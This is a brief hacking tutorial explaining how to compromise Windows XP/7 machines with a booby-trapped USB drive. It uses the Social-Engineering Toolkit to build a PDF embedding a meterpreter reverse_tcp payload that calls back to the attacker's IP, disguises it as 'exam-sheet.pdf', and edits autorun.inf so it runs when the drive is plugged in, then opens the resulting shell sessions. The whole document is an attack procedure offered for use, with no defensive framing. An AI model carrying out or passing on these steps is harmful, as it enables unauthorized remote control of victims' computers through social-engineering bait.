Remote System Hacking using Autorun.inf file
In this attack we use the autorun.inf file to establish the connection without clicking the file
Requirement :
Attacker : Backtrack
Victim : windows xp , windows 7 having pdf reader or comparable vulnerable software like ms-office or etc
Step 1 : go to the social engineering toolkit using
cd /pentest/exploits/set
./set
Step 2 : select the Social-Engineering Attacks by selecting 1
Step 3 : Select Infectious Media Generator by selecting option 3
Infectious Media Generation generate a autorun.inf file and a metasploit payload and these files can be copied into the USB/DVD/CD as the victim open the USB the payloads runs automatically .
Step 4 : select 1 for file-format exploits
here is the list of payloads you can select the payloads as per your requirements here i am using 11 adobe pdf Embedded EXE Social Engineering .
Step 5 : select 1 for use your own PDF for Attack
Now enter the path to pdf file as /home/exam-sheet.pdf (file name as exam-sheet.pdf )
Step 6 : select 2 for windows/meterpreter/reverse_tcp
Step 7 : IP address for listener attacker machine IP here my system address will be 192.168.56.101 and select Port to connect as port 80 which provides us the reverse connection using this port .
Step 8 : here we need to edit the autorun.inf file here go to the directory of autorun where our both files payload file & autorun file
follow the following steps to edit & rename our files
- open new terminal and type
- Now go to the directory cd /pentest/exploits/set/autorun
- type nano autorun.inf (it will open a nano editor for editing autorun.inf file here give the name of your file which you want to open by plugin the USB here i gives the name as exame-sheet.pdf)
- for changing the name of the file type mv template.pdf exame-sheet.pdf
- copy these both files into our usb drives
As we plugins the usb in the victim system the meterpreter sessions will opens
we can list the open sessions by typing sessions -l commands & for connecting the sessions type sessions -i 1